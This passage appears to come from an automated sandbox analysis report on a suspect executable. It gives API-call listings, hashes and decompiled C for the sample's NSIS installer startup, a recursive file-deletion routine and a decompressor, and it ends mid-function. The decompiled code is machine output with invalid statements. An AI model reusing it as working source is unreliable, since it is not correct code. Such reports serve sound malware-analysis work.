                                                                                  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                                                                • GetCommandLineA.KERNEL32(00423680,NSIS Error), ref: 00403139
                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 0040314C
                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000020), ref: 00403177
                                                                                • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                                                                • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                                                                • OleUninitialize.OLE32(00000000), ref: 004032BC
                                                                                • ExitProcess.KERNEL32 ref: 004032DC
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000,00000000), ref: 004032E8
                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000,00000000), ref: 004032F4
                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                                                                • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\h8lD4SWL35.exe,0041F030,00000001), ref: 00403365
                                                                                • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                                                                • ExitWindowsEx.USER32 ref: 00403423
                                                                                • ExitProcess.KERNEL32 ref: 00403446
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\h8lD4SWL35.exe" $1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\h8lD4SWL35.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                • API String ID: 2278157092-211847188
                                                                                • Opcode ID: 375663ebc80f87db243808723caa894ceb4dcd6c55227c23a832537f133ebd2b
                                                                                • Instruction ID: da1bb279ede92a07c65db21c06f8f5201e159813fed4aec25e96a6a2d7e5774a
                                                                                • Opcode Fuzzy Hash: 375663ebc80f87db243808723caa894ceb4dcd6c55227c23a832537f133ebd2b
                                                                                • Instruction Fuzzy Hash: 5891B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405302, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E00405302(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055B1(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f08 =  *0x423f08 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E004059DD(0x421480, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405517(_t72);
					} else {
						lstrcatA(0x421480, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421480,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004054FB( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E004059DD(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405695(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404D7B(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f08 =  *0x423f08 + 1;
										} else {
											E00404D7B(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040572B();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405302(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421480 - 0x5c;
					if( *0x421480 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CD4(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054D0(_t72);
							E00405695(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D7B(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404D7B(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040572B();
						}
						L33:
						 *0x423f08 =  *0x423f08 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                0x0040530d
                                                                                0x00405311
                                                                                0x0040531a
                                                                                0x0040531d
                                                                                0x00405320
                                                                                0x00405328
                                                                                0x0040532a
                                                                                0x0040532b
                                                                                0x00000000
                                                                                0x0040532b
                                                                                0x0040533a
                                                                                0x0040533a
                                                                                0x0040533d
                                                                                0x00405340
                                                                                0x00405354
                                                                                0x0040535b
                                                                                0x00405360
                                                                                0x00405362
                                                                                0x00405372
                                                                                0x00405364
                                                                                0x0040536a
                                                                                0x0040536a
                                                                                0x00405377
                                                                                0x0040537a
                                                                                0x00405385
                                                                                0x0040538b
                                                                                0x00405390
                                                                                0x004053a0
                                                                                0x004053a2
                                                                                0x004053a8
                                                                                0x004053ab
                                                                                0x004053ae
                                                                                0x0040546b
                                                                                0x0040546b
                                                                                0x0040546f
                                                                                0x00405471
                                                                                0x00405471
                                                                                0x00405471
                                                                                0x00405471
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004053b4
                                                                                0x004053b4
                                                                                0x004053bd
                                                                                0x004053c3
                                                                                0x004053c8
                                                                                0x004053cb
                                                                                0x004053cd
                                                                                0x004053d1
                                                                                0x004053d3
                                                                                0x004053d3
                                                                                0x004053d1
                                                                                0x004053d6
                                                                                0x004053d9
                                                                                0x004053ec
                                                                                0x004053ee
                                                                                0x004053f3
                                                                                0x004053fa
                                                                                0x00405412
                                                                                0x00405418
                                                                                0x0040541e
                                                                                0x00405420
                                                                                0x00405445
                                                                                0x00405422
                                                                                0x00405422
                                                                                0x00405426
                                                                                0x0040543a
                                                                                0x00405428
                                                                                0x0040542b
                                                                                0x00405430
                                                                                0x00405432
                                                                                0x00405433
                                                                                0x00405433
                                                                                0x00405426
                                                                                0x004053fc
                                                                                0x00405402
                                                                                0x00405404
                                                                                0x0040540a
                                                                                0x0040540a
                                                                                0x00405404
                                                                                0x00000000
                                                                                0x004053fa
                                                                                0x004053db
                                                                                0x004053de
                                                                                0x004053e0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004053e2
                                                                                0x004053e4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004053e6
                                                                                0x004053ea
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040544a
                                                                                0x00405454
                                                                                0x0040545a
                                                                                0x0040545a
                                                                                0x00405465
                                                                                0x00000000
                                                                                0x00405465
                                                                                0x0040537c
                                                                                0x00405383
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405342
                                                                                0x00405342
                                                                                0x00405344
                                                                                0x00405475
                                                                                0x00405478
                                                                                0x0040547b
                                                                                0x004054cd
                                                                                0x004054cd
                                                                                0x004054cd
                                                                                0x0040547d
                                                                                0x00405480
                                                                                0x0040548b
                                                                                0x00405490
                                                                                0x00405492
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405495
                                                                                0x0040549b
                                                                                0x004054a1
                                                                                0x004054a7
                                                                                0x004054a9
                                                                                0x00000000
                                                                                0x004054c5
                                                                                0x004054ab
                                                                                0x004054af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004054b4
                                                                                0x004054b9
                                                                                0x004054ba
                                                                                0x00000000
                                                                                0x004054bb
                                                                                0x00405482
                                                                                0x00405482
                                                                                0x00000000
                                                                                0x00405482
                                                                                0x0040534a
                                                                                0x0040534e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040534e

                                                                                APIs
                                                                                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 00405320
                                                                                • lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 0040536A
                                                                                • lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 0040538B
                                                                                • lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 00405391
                                                                                • FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000), ref: 004053A2
                                                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
                                                                                • FindClose.KERNEL32(?), ref: 00405465
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
                                                                                • \*.*, xrefs: 00405364
                                                                                • "C:\Users\user\Desktop\h8lD4SWL35.exe" , xrefs: 0040530C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\h8lD4SWL35.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                • API String ID: 2035342205-1826458412
                                                                                • Opcode ID: 90ad0969ff0ee796c5d1dc7c88e12098e6cf1f51b9ad34765bdbeee7d1217a06
                                                                                • Instruction ID: 1fc74d801e6ff0501578027e70e5e3a059217de386785bbc545a3883b63b473f
                                                                                • Opcode Fuzzy Hash: 90ad0969ff0ee796c5d1dc7c88e12098e6cf1f51b9ad34765bdbeee7d1217a06
                                                                                • Instruction Fuzzy Hash: 0F511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF945751D2C7BC4981DE6E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405FA4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00405FA4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406847))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
